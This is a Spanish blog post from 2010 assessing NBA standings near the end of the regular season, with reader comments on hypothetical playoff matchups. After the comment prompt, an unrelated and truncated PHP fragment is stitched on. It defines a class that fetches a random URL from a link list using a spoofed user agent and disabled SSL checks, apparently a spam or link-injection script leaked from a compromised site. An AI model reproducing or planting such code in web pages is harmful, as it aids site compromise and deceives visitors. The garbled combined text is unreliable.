Informe #16

22 de March de 2010 por TheDeerHunter

Hoy revisaremos el estado de la liga tras las últimas semanas, a poco más de una decena de partidos del final de la liga regular.

¿Porqué todos los jugones sonríen igual?

Los Cavs prácticamente se han asegurado la ventaja campo para toda la postemporada. Jugando sin centers natos se han mostrado tan intratables como con ellos. Jamison se ha adaptado perfectamente a su nuevo equipo y próximamente recuperarán a Ilgauskas. Registran la mejor marca de la liga, el mejor diferencial, la mejor racha y el mejor balance durante los últimos 10 partidos.

Orlando también se clasificó ya hace algunos días para la postemporada y es que son los únicos que aguantan el ritmo a los Cavs. Les resta un calendario no demasiado cómodo, pero será difícil que pierdan la 2ª plaza del Este. Las piezas han terminado de encajar y ya velan armas para playoffs.

Queremos destacar también a los Bucks, plenamente consolidados en la 5ª plaza de su conferencia y extremadamente finos en su juego. Su rival será muy posiblemente Atlanta o Boston, cuyas series particulares todavía no se han resuelto.Por su parte los Blazers están aguantando sólidamente la 8ª plaza del Oeste y eso es decir mucho. Para hacernos una idea los que peor están jugando de los 10 primeros de esta conferencia están en un 70% de victorias en los últimos 10 partidos.

Ganarás el pan con el sudor de tu frente

Wild Wild West. Y llegamos a decir que este año el Oeste venía flojo. Nada más lejos de la realidad.

Houston y Memphis, están jugando muy bien y ganando, pero tienen todas las papeletas para quedarse fuera. No sólo no consiguen reducir distancias sino que acaso se las aumentan. Engordar para morir.

La baja de Bynum, parece ser que es menos grave de lo que podía haber sido. Los Lakers tendrán que aguantar sin él lo que queda de mes como mínimo precísamente ahora que comienzan una gira salvaje con partidos contra Spurs, Thunder, Rockets, Hornets, Hawks, Jazz, Nuggets o Blazers. Casi nada.

Por detrás vienen Nuggets y Mavs como un tiro, con casi 5 partidos de desventaja con respecto a los amarillos, eso sí. Tal y como está el asunto quedar segundos o terceros importaría para la hipotética ventaja campo en semifinales de conferencia porque el rival en primera ronda, además de ser una ruleta rusa, pueden ser todos igual de peligrosos. Si tuviera que apostar lo haría por Mavericks, con un calendario sutilmente menos complicado.

Jazz, Suns, Thunder y Spurs están todos a un gran nivel, intercambiándose posiciones prácticamente en cada jornada. La diferencia entre el 4º clasificado y el 8º son apenas tres partidos. El premio de la ventaja campo en primera ronda va a salir caro.

En el Este tanto Boston y Atlanta por un lado, como Charlotte y Miami por otro están fuertes.

Se dejaban llevar

El caso más sorprendente son los Raptors, que sí se están jugando alguna cosa más que los puestos de lotería. El único equipo en plaza de postemporada y con un balance claramente negativo en los últimos partidos. Tienen suerte que los Bulls están a otra y parece que no les apretarán. El premio será postemporada, pero no lograr ese viejo objetivo que era pasar de primera ronda.

Los Hornets han bajado definitivamente los brazos. Ahora volverá Chris Paul y con él disponible hasta el rabo todo es toro. De todas formas están fuera.

Knicks, Pacers y Kings están mostrando un nivel aceptable. Ahora que ya no se juegan absolutamente nada. Maquillando balances.

El carabasas club

Minnesotta y Washington son los reyes del club estos días. Balance perfecto de 0-10. Los Wizards parecían resurgir tras resolver el tema Arenas. Donde no hay…

Muy sangrante el tema de los Bulls. Estuvo muy en su mano clasificar para postemporada y, de hecho, aún lo tienen a tiro. La buena noticia es que Del Negro terminará inesperadamente la temporada, pero no más allá. Da la sensación que le han puesto unas cuantas zancadillas.

Sixers, Pistons, Clippers y Warriors posicionándose para la lotería. Los Nets, sin embargo, tiene esa faena hecha.

Comenta

8 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    En estos momentos Charlotte es 7º, pero igual les venia bien quedar 8º y jugar contra Cleveland, viendo lo bien que se les ha dado jugar contra ellos en la Liga… aunque en playoffs es otro cantar, pero seguro que LeBron y compañia prefieren a Toronto antes que a los Bobcats.

      Citar

  2. TheDeerHunter dice:
    #2

    tengo muchas dudas de que haya nadie que prefiera a ningún otro equipo antes que a Toronto

      Citar

  3. Rompe dice:
    #3

    ¿Qué pasaría si en PO jugaran el 1º del Este contra el 8º del Oeste y así? ¿Cuántos equipos del Oeste pasarían a 2º ronda? Yo creo que 6 mínimo!

      Citar

  4. sergio dice:
    #4

    Seria interesante Rompe.. pero dudo que no pasasen los 3 primeros de cada Conferencia: a ver como serian los emparejamientos:

    Lakers-Toronto — creo que esta bien clarito. Las 18 victorias de diferencia hablan por si solas

    Denver–Charlotte — me pareceria un duelo muy interesante, pudiendo resumirlo en el Carmelo-Gerald Wallace pero creo que a 7 partidos no tendria color. Para Denver claro

    Dallas-Miami — Los de Texas van en una tendencia al alza y los de Florida al contrario. Seguro que se tomarian la revancha del 2006. Eso si, nunca te fies de Wade en Playoffs.

    Utah-Milwaukee — El favorito deberia ser Utah, pero ultimamente son un equipo capaz de lo mejor y lo peor. Los Bucks me parecen un equipo mas regular. Supongo que la figura de Deron se deberia imponer al novato Jennings

    Boston-Phoenix — Probablemente el partido mas igualado de todos. Los emparejamientos Rondo-Nash y Garnett(sano)-Stoudamire deberian valer por si solos para pagar una entrada. Desde luego considero a Boston favoritos en Playoffs. Al equipo de Arizona le faltaria un Allen/Pierce para establecer una racha ofensiva.

    Oklahoma-Atlanta — Apasionante duelo de equipos jovenes. Durant seria la llave del equipo para aspirar a una hipotetica victoria en la serie. Yo apostaria por Atlanta si tuviera que hacerlo.

    San Antonio-Orlando — Otro duelo historico entre Duncan y Howard, pasado y futuro de la liga. Mi conciencia me dice Orlando, pero ya sabemos como las gasta San Antonio y mas con un Ginobili en racha.

    Portland-Cleveland — Pues como el LA-Toronto, creo que poca tela que cortar

      Citar

  5. LEmontus dice:
    #5

    Si se hiciese así no pasarían 6 del oeste y la verdad lo de spurs orlando tambien sería claro para orlando yo creo que sería muy dificil para spurs en definitiva los partidos en duda serían:
    utah-Bucks(obviamente yo apostaría por utah sin pensarlo y lo preferiría a un boston o atalanta que para mi son más equipo)
    Phoenix-Boston todo dependería del nivel de nash con el canandiense entonado como a principios de temproada sería un duelo apasionante pero con las molestias fisicas que arrastra y el nivel de sus últimos partidos el partido lo daría para Boston.

    Denver-Charlotte Atlanta-Thunder son partidos con claros favoritos aunque por supuesto con opción a sorpresa, no puede darse por perdido a un equipo que tenga a Durant(+ westbrook) o Jackson(+wallace con el plus de que puede defender perefectamente a melo). En este sentido las conferencis estarían igualadas.

      Citar

  6. Txusma dice:
    #6

    Lemontus, me despistas. Yo hubiese creído q en el Jazz-Bucks apostarías por Milwaukee sin ninguna duda.

      Citar

  7. kantonyo dice:
    #7

    Tanto hablar de Bogut y Jennings, pero el que de verdad se está saliendo es John Salmons, ayer 32 puntos en la victoria contra Atlanta, autentico revulsivo de los Bucks.

      Citar

  8. LEmontus dice:
    #8

    Txusma me he equivocado…xd apostaria por bucks y prefereria a utah antes que atalanta o boston.
    Salmons es un grandísimo anotador y el amigo Skiles le esta enseñando a defender cosa esencial en este equipo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>